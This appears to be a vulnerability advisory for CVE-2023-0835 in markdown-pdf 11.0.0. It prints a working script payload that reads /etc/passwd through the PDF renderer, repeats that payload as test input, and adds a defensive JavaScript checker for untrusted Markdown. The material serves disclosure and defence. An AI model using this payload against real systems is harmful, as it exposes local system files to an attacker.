markdown-pdf - CVE-2023-0835

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.


PoC || GTFO

<script>
 // Path Disclosure
 document.write(window.location);
 // Arbitrary Local File Read
 xhr = new XMLHttpRequest;
 xhr.onload=function(){document.write((this.responseText))};
 xhr.open("GET","file:///etc/passwd");
 xhr.send();
</script>
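
A defensive counterpart to the PoC above, added here as an example (it is not markdown-pdf's code or its fix): a fail-closed check that rejects untrusted Markdown containing raw HTML elements, or link schemes outside an allow-list, before the document reaches the renderer. The names `checkMarkdown`, `ALLOWED_SCHEMES` and the rule labels are assumptions made for this example.

```javascript
// Added example, not markdown-pdf code. checkMarkdown, ALLOWED_SCHEMES and the
// rule names are hypothetical.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Raw HTML element: "<" or "</", a tag name, then whitespace, "/", ">" or end
// of line. Autolinks like <https://example.com> do not match (":" follows).
const RAW_HTML = /<\/?[a-zA-Z][a-zA-Z0-9-]*(?=[\s\/>]|$)/;

// Scheme of an inline link or image "](scheme:", an autolink "<scheme:",
// or a reference definition "[id]: scheme:".
const LINK_SCHEME =
  /(?:\]\(\s*<?|<|^\s*\[[^\]]+\]:\s*<?)([a-zA-Z][a-zA-Z0-9+.-]*):/g;

// Returns one finding per rule hit; an empty array means nothing was flagged.
function checkMarkdown(markdown) {
  const findings = [];
  markdown.split(/\r?\n/).forEach((text, i) => {
    const line = i + 1;
    if (RAW_HTML.test(text)) findings.push({ line, rule: "raw-html" });
    for (const m of text.matchAll(LINK_SCHEME)) {
      const scheme = m[1].toLowerCase();
      if (!ALLOWED_SCHEMES.has(scheme)) {
        findings.push({ line, rule: "scheme:" + scheme });
      }
    }
  });
  return findings;
}

// Constructed input: a Markdown document carrying the PoC from this page.
const POC_DOC = [
  "# Quarterly report",
  "<script>",
  " xhr = new XMLHttpRequest;",
  ' xhr.open("GET","file:///etc/passwd");',
  " xhr.send();",
  "</script>",
].join("\n");

// Constructed input: ordinary Markdown that must pass without findings.
const BENIGN_DOC =
  "# Title\n\nSee <https://example.com> and [docs](https://example.com/a).\n\n    if (a < b && c > d)";

for (const f of checkMarkdown(POC_DOC)) {
  console.log(`rejected: line ${f.line} (${f.rule})`);
}
console.log("benign findings:", checkMarkdown(BENIGN_DOC).length);
```

The check is line-based and deliberately flags HTML inside code blocks as well, so a document is only rendered when nothing tag-like appears anywhere in it.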
